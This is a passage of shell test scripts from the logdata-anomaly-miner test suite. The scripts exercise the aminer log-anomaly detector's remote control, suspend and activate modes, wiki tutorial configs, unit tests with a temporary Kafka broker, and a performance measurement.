sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog sudo aminer --config "$FILE" & > /dev/null sleep 1 START_TIME=$(date +%s) stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list=$(echo "$expected_list" | sed -e "s/\"next_persist_time\".*,//") if [[ "$stdout" != "$expected_list" ]]; then echo "$ERROR exec-file." echo "$stdout" echo echo "Expected: $expected_list" echo exit_code=1 fi EXEC_FILE_TIME=$(($(date +%s)-START_TIME)) sudo pkill -x aminer sleep 2 & wait $! sudo rm $CMD_PATH echo "Command execution time with --exec ${EXEC_TIME}s" echo "Command execution time with --exec-file ${EXEC_FILE_TIME}s" exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runSuspendModeTest.sh000077500000000000000000000062741437606560100251700ustar00rootroot00000000000000sudo cp demo/aminerRemoteControl/demo-config.py /tmp/demo-config.py echo "config_properties['Core.PersistencePeriod'] = 10" | sudo tee -a /tmp/demo-config.py > /dev/null sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog ln -s $PWD/../source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py $PWD/aminerremotecontrol FILE=/tmp/demo-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi exit_code=0 SUSPEND_FILE=/tmp/suspend_output.txt SUSPEND_FILE_MD5=/tmp/suspend.md5 sudo aminer --config "$FILE" > $SUSPEND_FILE & PID=$! 
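# Give the aminer started above time to come up, then record a checksum of its output
# file before feeding the first log line.
sleep 5
md5sum "$SUSPEND_FILE" > "$SUSPEND_FILE_MD5" 2> /dev/null
echo "User username logged in" >> /tmp/syslog
sleep 1
# md5sum -c prints "<file>: OK" only when the output file is unchanged.
md5_result=$(md5sum -c "$SUSPEND_FILE_MD5" 2> /dev/null)
if [[ $md5_result == "$SUSPEND_FILE: OK" ]]; then
  echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (1)'
  exit_code=1
fi

# Checksums of every persisted file under /tmp/lib/aminer, excluding the log files,
# which are excluded so that ongoing logging does not look like persisted data.
persistence_checksums() {
  find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.txt" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \;
}

persistence_checksums > /tmp/test1.md5
sleep 1
md5sum "$SUSPEND_FILE" > "$SUSPEND_FILE_MD5" 2> /dev/null
sudo aminerremotecontrol --exec "suspend" > /dev/null
echo " Current Disk Data is: Filesystem Type Size Used Avail Use% %" >> /tmp/syslog
md5_result=$(md5sum -c "$SUSPEND_FILE_MD5" 2> /dev/null)
if [[ $md5_result != "$SUSPEND_FILE: OK" ]]; then
  echo 'The aminer has produced outputs after being suspended.'
  exit_code=1
fi
sleep 5
persistence_checksums > /tmp/test2.md5

sudo aminerremotecontrol --exec "activate" > /dev/null
# Wait for the reactivated aminer to process the line appended while it was suspended,
# then re-check the output file against the checksum taken before the suspend.
# (Before, a stale md5_result was compared with "/tmp/syslog: OK", which can never
# match, so check (2) never fired.)
sleep 5
md5_result=$(md5sum -c "$SUSPEND_FILE_MD5" 2> /dev/null)
if [[ $md5_result == "$SUSPEND_FILE: OK" ]]; then
  echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (2)'
  exit_code=1
fi
# Remaining wait so that a full persistence period elapses after activation.
sleep 5
persistence_checksums > /tmp/test3.md5

suspend_diff=$(diff /tmp/test1.md5 /tmp/test2.md5)
activate_diff=$(diff /tmp/test2.md5 /tmp/test3.md5)
if [[ $suspend_diff != "" ]]; then
  cat /tmp/test1.md5
  cat /tmp/test2.md5
  echo 'The aminer should not persist data after being suspended.'
  exit_code=1
fi
if [[ $activate_diff == "" ]]; then
  cat /tmp/test2.md5
  cat /tmp/test3.md5
  echo 'The aminer should persist data after being activated.'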
exit_code=1 fi sudo pkill -x aminer sleep 3 wait $PID if [[ $? != 0 ]]; then exit_code=1 fi sudo rm /tmp/demo-config.py sudo rm /tmp/suspend_output.txt sudo rm /tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo rm /tmp/suspend.md5 sudo rm aminerremotecontrol sudo rm /tmp/test1.md5 sudo rm /tmp/test2.md5 sudo rm /tmp/test3.md5 test -e /var/mail/mail && sudo rm -f /var/mail/mail exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runTryItOut.sh000077500000000000000000000375071437606560100236500ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write log lines from 4th to 5th ``` into /tmp/access_00 and /tmp/access_01. # 2.) Read 1st ```python to 6th ``` and compare it with ApacheAccessParsingModel. # 3.) Run the linking command between 7th and 8th ```. # 4.) Run the copy command from the 2nd line between 9th and 10th ``` and extract the CFG_PATH from that line. # 5.) Extract the line between 1st ```yaml and 11th ``` and replace LearnMode: False with it in CFG_PATH. # 6.) Replace LogResourceList path with "/tmp/access_00" in CFG_PATH. # 7.) Replace all Parser config lines in CFG_PATH with Parser config lines between 3rd ```yaml and 13th ```. # 8.) Replace all Input config lines in CFG_PATH with Input config lines between 4th ```yaml and 14th ```. # 9.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 5th ```yaml and 15th ```. # 10.) Replace all EventHandlers config lines in CFG_PATH with EventHandlers config lines between 6th ```yaml and 16th ```. # 11.) Parse the aminer CMD between 17th and 18th ``` and run it. Check if no error is output by the aminer. # 12.) 
Compare the results with the count report between 19th and 20th ``` (without actual numbers and timestamps - replace them with constant values). # 13.) Run the rm command between 21st and 22nd ``` to remove the persisted data. # 14.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 8th ```yaml and 26th ```, run CMD and check if no # error is output by the aminer by comparing the output with the lines between 27th and 28th ```. # 15.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 10th ```yaml and 34th ```, run CMD and check if no error is output by the aminer. # 16.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 11th ```yaml and 43rd ```, run CMD and check if no error is output by the aminer. # 17.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 12th ```yaml and 48th ```, run CMD and check if no error is output by the aminer. # 18.) Replace all Parser config lines in CFG_PATH with Parser config lines between 14th ```yaml and 58th ```, run CMD and check if no error is output by the aminer. # 19.) Replace all Parser config lines in CFG_PATH with Parser config lines between 17th ```yaml and 65th ```, run CMD and check if no error is output by the aminer. # 20.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 18th ```yaml and 66th ```, run CMD and check if no error is output by the aminer. # 21.) Replace all Parser config lines in CFG_PATH with Parser config lines between 20th ```yaml and 74th ```, run CMD and check if no error is output by the aminer. # 22.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 21st ```yaml and 75th ```, run CMD and check if no error is output by the aminer. # 23.) Replace all Parser config lines in CFG_PATH with Parser config lines between 23rd ```yaml and 81st ```, run CMD and check if no error is output by the aminer. # 24.) 
Replace all Analysis config lines in CFG_PATH with Analysis config lines between 24rd ```yaml and 82th ```, run CMD and check if no error is output by the aminer. # 25.) Write the config between 26th ```yaml and 92th ``` to CFG_PATH, run CMD and check if no error is output by the aminer. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/aminer-TryItOut.md OUT=/tmp/out.txt LOG1=/tmp/access_00 LOG2=/tmp/access_01 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # write access logs (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $LOG1 cp $LOG1 $LOG2 # compare ApacheAccessParsingModel (2.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/ait-lds/ApacheAccessParsingModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 2." exit_code=$((exit_code | $?)) # link available configs (3.) awk '/^```$/ && ++n == 7, /^```$/ && n++ == 8' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) sudo $CMD > $OUT 2> /dev/null # copy template config and extract CFG_PATH. (4.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) $CMD IFS=' ' read -ra ADDR <<< "$CMD" CFG_PATH=$(echo "${ADDR[-1]}") # replace LearnMode: False with LearnMode: True in CFG_PATH. (5.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) sed "s/#LearnMode: false/${OUT1}/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace LogResourceList file. (6.) 
OUT1=$(echo $LOG1) sed "s?file:///var/log/apache2/access.log?file:///${OUT1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace parser, input, analysis and event handler config lines (7.-10.) CFG_BEFORE=$(sed '/^Parser:$/Q' $CFG_PATH) CFG_PARSER=$(awk '/^Parser:$/,/^Input:$/' < $CFG_PATH) CFG_PARSER=$(echo "$CFG_PARSER" | sed '$d') CFG_INPUT=$(awk '/^Input:$/,/^Analysis:$/' < $CFG_PATH) CFG_INPUT=$(echo "$CFG_INPUT" | sed '$d') CFG_ANALYSIS=$(awk '/^Analysis:$/,/^EventHandlers:$/' < $CFG_PATH) CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed '$d') CFG_EVENT_HANDLERS=$(awk '/^EventHandlers:$/,/^$/' < $CFG_PATH) CFG_EVENT_HANDLERS=$(echo "$CFG_EVENT_HANDLERS" | sed '$d') CFG_PARSER=$(awk '/^```yaml$/ && ++n == 3, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_INPUT=$(awk '/^```yaml$/ && ++n == 4, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d') # change report_interval so the test does not need to wait 10 seconds CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed 's/report_interval: 10/report_interval: 3/g') CFG_EVENT_HANDLERS=$(awk '/^```yaml$/ && ++n == 6, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null # Parse the aminer CMD and run it. Check if no error is output by the aminer. (11.) awk '/^```$/ && ++n == 17, /^```$/ && n++ == 18' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 11." exit_code=$((exit_code | $?)) # Compare the results with the count report. (12.) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. 
IN1=$(sed -n '1,7p' < $OUT) IN2=$(sed -n '8p' < $OUT) IN3=$(sed -n '9p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,7p' < $OUT) OUT2=$(sed -n '8p' < $OUT) OUT3=$(sed -n '9p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN2" IN2="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT2" OUT2="${ADDR[0]}" compareStrings "$OUT2" "$IN2" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN3" IN3="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT3" OUT3="${ADDR[0]}" compareStrings "$OUT3" "$IN3" "Failed Test in 12." exit_code=$((exit_code | $?)) # Remove the persisted data. (13.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $OUT CMD1=$(sed -n '2p' < $OUT) $CMD1 # Replace the Analysis config and compare the output. (14.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 8, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null sudo rm -r /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 2> /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 14." exit_code=$((exit_code | $?)) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,22p' < $OUT) IN2=$(sed -n '24,26p' < $OUT) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,22p' < $OUT) OUT2=$(sed -n '24,26p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 14." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 14." 
exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (15.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 10, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 15." exit_code=$((exit_code | $?)) # skipping this check, because it has to change the log resources. #IN1=$(cat $OUT) #awk '/^```$/ && ++n == 39, /^```$/ && n++ == 40' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 15." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (16.) ANALYSIS_PREFIX='Analysis: ' CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 11, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$ANALYSIS_PREFIX$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 16." exit_code=$((exit_code | $?)) # skipping this check, because not all log lines were used in this test, so the output can not be reproduced. #IN1=$(sed -n '113,148p' < $OUT) #awk '/^```$/ && ++n == 46, /^```$/ && n++ == 47' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 16." 
#exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (17.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 12, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 17." exit_code=$((exit_code | $?)) # Replace the Parser config. (18.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 14, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 18." exit_code=$((exit_code | $?)) # Replace the Parser config. (19.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 17, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (20.) 
CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 18, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (21.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 20, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (22.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 21, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (23.) 
CFG_PARSER=$(awk '/^```yaml$/ && ++n == 23, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (24.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 24, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Run the final configuration. (25.) awk '/^```yaml$/ && ++n == 26, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 25." 
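exit_code=$((exit_code | $?)) rm $OUT rm $LOG1 rm $LOG2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/runUnittests.sh000077500000000000000000000040341437606560100240740ustar00rootroot00000000000000
#!/bin/bash
# Run every aminer unit-test suite in parallel against a throw-away
# Kafka/ZooKeeper instance, then tear everything down again.
# ./config must define KAFKA_URL and KAFKA_VERSIONSTRING. It may also define
# KAFKA_SHA256 (expected checksum of the archive at KAFKA_URL); when set, the
# download is verified before it is unpacked.
source config

if [[ -z "$KAFKA_URL" || -z "$KAFKA_VERSIONSTRING" ]]; then
  # An empty KAFKA_VERSIONSTRING would turn the "rm -r" in the cleanup into "rm -r /".
  echo "config must define KAFKA_URL and KAFKA_VERSIONSTRING."
  exit 1
fi

# Fetch Kafka first so that a failed download leaves nothing behind in /etc.
# -f: an HTTP error page must not be unpacked as if it were the archive.
curl -f "$KAFKA_URL" --output kafka.tgz || { echo "Download of $KAFKA_URL failed."; exit 1; }
if [[ -n "$KAFKA_SHA256" ]]; then
  echo "$KAFKA_SHA256  kafka.tgz" | sha256sum -c - || { echo "kafka.tgz checksum mismatch."; rm -f kafka.tgz; exit 1; }
fi
tar xvf kafka.tgz > /dev/null
rm kafka.tgz

sudo cp unit/data/kafka-client.conf /etc/aminer/kafka-client.conf
sudo cp unit/data/configfiles/Sub* /etc/aminer/conf-enabled/

"$KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh" "$KAFKA_VERSIONSTRING/config/zookeeper.properties" > /dev/null &
sleep 1
"$KAFKA_VERSIONSTRING/bin/kafka-server-start.sh" "$KAFKA_VERSIONSTRING/config/server.properties" > /dev/null &

exit_code=0

# start_suite DIR: run unittest discovery for unit/DIR in the background; the PID is left in $!.
start_suite() {
  sudo python3 -bb -m unittest discover -s "unit/$1" -p '*Test.py' > /dev/null &
}

# check_suite PID NAME: wait for one suite and record a failure in exit_code.
check_suite() {
  if ! wait "$1"; then
    exit_code=1
    echo "Failed in $2 unittests."
  fi
}

start_suite analysis; ANALYSIS_PID=$!
start_suite events; EVENTS_PID=$!
start_suite input; INPUT_PID=$!
start_suite parsing; PARSING_PID=$!
start_suite util; UTIL_PID=$!
start_suite data; DATA_PID=$!

check_suite "$ANALYSIS_PID" Analysis
check_suite "$PARSING_PID" Parsing
check_suite "$UTIL_PID" Util
check_suite "$INPUT_PID" Input
check_suite "$EVENTS_PID" Events
check_suite "$DATA_PID" Data

# Cleanup of everything the suites and the broker left behind.
test -e /var/mail/mail && sudo rm -f /var/mail/mail
sudo rm /tmp/test4unixSocket.sock
sudo rm /tmp/test5unixSocket.sock
sudo rm /tmp/test6unixSocket.sock
sudo rm -r /tmp/lib/aminer/*
"$KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh" > /dev/null
"$KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh" > /dev/null
sudo rm -r "$KAFKA_VERSIONSTRING/"
sudo rm -r /tmp/zookeeper
sudo rm -r /tmp/kafka-logs
sudo rm /etc/aminer/kafka-client.conf
# The Sub* configs were installed into /etc/aminer/conf-enabled/ above; the
# former relative path "etc/aminer/conf-enabled/Sub*" never matched, so they
# were left behind after every run.
sudo rm /etc/aminer/conf-enabled/Sub*
exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/system/000077500000000000000000000000001437606560100223315ustar00rootroot00000000000000
logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/000077500000000000000000000000001437606560100257725ustar00rootroot00000000000000
logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/aminerSystemPerformanceTest.sh000077500000000000000000000046411437606560100340400ustar00rootroot00000000000000
#!/bin/bash
# Measure aminer resource usage on this machine: start aminer on /tmp/syslog
# with /tmp/performance-config.py, sample CPU/memory with
# generateSystemLogdata.py for the requested time, and collect the CSV plus a
# copy of the config in /tmp/results_<timestamp>.
# Usage: ./aminerSystemPerformanceTest.sh RUNTIME_SECONDS "DESCRIPTION"
# The machine description below is free text that is only copied into the report.
MACHINE_NAME="Acer Aspire 5750g"
CPU_NAME="i7-2630QM"
CPU_Number="0.1"
RAM_Used="32MB"
Persistent_Memory_Type="SSD"

AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/*   # glob, deliberately expanded unquoted below
t=$(date +%d.%m.%Y_%H-%M-%S)
RESULTS_DIR=/tmp/results_$t
RESULTS_PATH=/tmp/results.csv
LOGFILE=/tmp/syslog
FILE=/tmp/performance-config.py

sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir /tmp/lib/aminer 2> /dev/null
sudo chown -R "$USER:$USER" /tmp/lib/aminer 2> /dev/null
# Start from an empty persistence directory so earlier runs do not skew the numbers.
sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null
sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null
sudo rm -r "$RESULTS_PATH" 2> /dev/null
mkdir "$RESULTS_DIR"

if ! test -f "$FILE"; then
  echo "$FILE does not exist!"
  exit 1
fi
if [[ $# -lt 2 ]]; then
  echo "Error, not enough parameters found!"
  echo "Please run the script with a parameter for the runtime in seconds and a parameter for the description."
  echo "For example: ./aminerSystemPerformanceTest.sh 900 \"Low performance test with many outputs. (./multiplyLogFile.sh 400000 syslog_low_performance_many_outputs-template /tmp/syslog)\""
  exit 1
fi

waitingTime=$1
description=$2

echo ""
echo "calculating the MD5 sum of the logfile.."
# Only identifies the input file in the report; not an integrity check.
MD5=$(md5sum "$LOGFILE" | awk '{ print $1 }')
echo "counting the lines of the logfile.."
LINE_NUMBER=$(wc -l < "$LOGFILE" | tr -d "\n")

# NOTE: this installs an unpinned package from the network as root when it is
# missing; pre-installing psutil (e.g. from the distribution) avoids that.
if ! python3 -c "import psutil"; then
  sudo pip3 install psutil
fi

echo "Performance test started.."
echo ""
# The sampler runs 10 s longer than aminer so it also records the shutdown.
python3 generateSystemLogdata.py $((waitingTime+10)) 2> /tmp/error.log &
GEN_PID=$!
# start aminer (backgrounded inside the aminer user's shell)
sudo -H -u aminer bash -c "aminer --config '$FILE' &"
sleep "$waitingTime"
touch "$RESULTS_PATH"
sudo chown -R aminer:aminer "$RESULTS_PATH"

# stop aminer
sleep 3
sudo pkill -x aminer
sleep 3
sudo chown -R "$USER:$USER" "$RESULTS_PATH" 2> /dev/null
# Report values are passed as arguments so a '%' in the description cannot
# be interpreted as a format directive.
printf ' in %s seconds.\nThe source file contains %s log lines.\n\nmachine name, CPU name, #CPUs used, RAM used, persistent memory type\n%s, %s, %s, %s, %s\n\nConfig File,config_%s.py\nMD5-Hash Logfile,%s\nTest description,%s\n\n' \
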